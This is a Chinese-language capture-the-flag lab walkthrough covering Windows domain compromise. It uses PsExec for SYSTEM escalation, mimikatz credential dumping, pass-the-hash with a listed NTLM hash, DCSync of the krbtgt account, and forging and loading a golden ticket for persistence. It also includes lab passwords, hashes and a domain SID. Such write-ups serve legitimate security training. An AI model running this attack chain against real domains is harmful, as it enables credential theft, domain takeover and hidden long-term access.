【内网渗透下WP】拿下域控（哈希传递与制作黄金票据）基础知识+靶场知识完整版

这是接着上一篇文章【内网渗透上WP】（基础知识+靶场操作完整版）SQL拿shell、WIN提权的后续。

一、基本思路

查询完整域名、找到域控主机—> 通过哈希传递获取域控管理员权限（类似于获取高权限Cookie，成为管理员）—> 登陆域控主机找到关键信息（获取flag）—>制作黄金票据，维持长久权限

二、基础知识

1、提升本机权限至system，以便查询完整域名、找到域控主机

查看域控主机名命令

net user /domain

但发现会被拒绝访问，发生这种情况，有两个原因：
(1)本机权限不够：
(2)本机账号在域内权限不够：
解决方案，可以使用微软官方工具PsExec.exe，提升本机管理员权限至系统权限（system）

提升命令

PsExec.exe -i -s -d cmd

调出域控主机cmd命令

PsExec.exe \\完整域名 cmd

2、哈希（hash）传递

使用工具minikatz
这个工具还是三板斧

Log //新建转存显示信息到同目录txt文件里
Privilege::debug   //开启特权调试模式
Sekurlsa::logonpasswords  //抓取管理员账号密码等信息

获取结果中的administrator的domain 和ntlm，我们要借用管理员的值，把自己伪装成域控主机管理员。
获取后，执行下面命令，即可自带域管理员信息访问了

Sekurlsa::pth /user:administrator /domain”域名” /ntlm:值

3、域控主机硬盘命令

dir \完整域控主机域名\盘符$

dir \\DC.zkaq.cn\c$ //样例

4、制作黄金票据

原理：krbtgt账户是KDC秘钥分发中心用的超管密码，使用此账户票据，客户机会认为我们是KDC秘钥分发中心，会直接给最高权限允许我们访问，一般管理员会修改域控机密码，但是很少有管理员会修改Krbtgt的密码。这就是所谓的黄金票据，可以维持长久访问的秘诀。

在域控主机上，使用工具minikatz 命令如下：

lsadump::dcsync /user:krbtgt

结果中收集两个值OSID（最后的50X不要）和hash_htlm

制作票据命令：

Kerberos::golden /admin:administrator /domain:”域名” /sid：OSID值 /krbtgt:hash_htlm值 /ticket:administrator.随便起

加载票据

Kerberos::ptt administrator.随便起（与生成时命名一致）

三、靶场演示

• 1、接着上一篇文章内网渗透上获取了账号：administrator 密码：woshifengge1. 远程连接靶场链接afsgr16-b1ferw.aqlab.cn:12781。再远程连接10.0.1.8
  

• 2、查看主机信息
  ipconfig

systeminfo

以上信息可知是64位系统，成员服务器，域名为zkaq.cn，域控主机IP大概率是10.0.1.6 ，由此得出下一步思路是查询域控主机名还有，还有获取域控主机管理员的信息值。（哈希传递）

• 3、查询域控主机名，遭拒绝，需利用官方工具将账号提升至system权限，再查

  net user /domain
  

上传官方工具PsExec.exe提权

PsExec.exe -i -s -d cmd  //注意路径，详见下图，获取主机名DC.zkaq.cn

• 4、尝试访问域控主机C盘

• 5、是拒绝的，需要工具minikatz，使用哈希传递

获取
user=administrator
Domain=ZKAQ
NTLM=61465a991b168727b65b3644aab823cd

将值放入下方命令中，完成哈希传递，以后利用这个CMD窗口运行，会自带域控管理员的值（类似于cookie）,拥有管理员权限。

Sekurlsa::pth /user:administrator /domain:”ZKAQ” /ntlm:61465a991b168727b65b3644aab823cd

• 6、启动域控主机cmd窗口，正式访问域控主机

使用官方工具PsExec.exe，命令如下：

PsExec.exe \\dc.zkaq.cn cmd  //注意执行路径在工具处哈

注意：需要在新弹出的能访问c盘的那个cmd窗口使用此命令。我个人对这个理解是，弹出的各个CMD窗口，权限各不相同，权限步步提升，不能乱来，否则权限不够。（个人理解，如果有误，请大佬们即使指正哈）

• 7、下一步，有两种方式

(1)cmd窗口，通过命令行一步步找到flag(特别麻烦，命令我给大家贴出来)

 cd 到路径c:\Users\Administrator.DC\Desktop目录下，有个flag.txt.txt
Type flag.txt.txt   //获取flag

(2)新建账号，直接远程登陆域控主机，拿到flag(下面截图展示这个方式)

建好账号后，直接登陆域控主机10.0.1.6（DC.zkaq.cn）

• 8、至此，靶场已经完成。但我们想更深入一步，制作黄金票据，长久维持权限！

在域控主机上，上传工具minikatz，右键管理员启动

lsadump::dcsync /user:krbtgt   //minikatz模拟域控请求账号密码信息

获取krbtgt账号的关键值（OSID和Hash_NTLM）

写入命令，如下

（1）制作票据

kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-4098506371-3349406080-1400905760 /krbtgt:9f7afad7acc9f72b7e338b908795b7da /ticket:administrator.heason

（2）加载票据

kerberos::ptt administrator.heason

现在试着返回10.0.1.8 测试这个黄金票据
（1）在10.0.1.8上启用普通cmd,尝试访问域控主机c盘资料，无权限。

（2）将黄金票据拷贝至桌面，启动工具mimikatz，使用加载命令

kerberos::ptt administrator.heason

之后再次在普通cmd窗口中尝试，成功了！！！

以上就是全部过程，完结，撒花！！！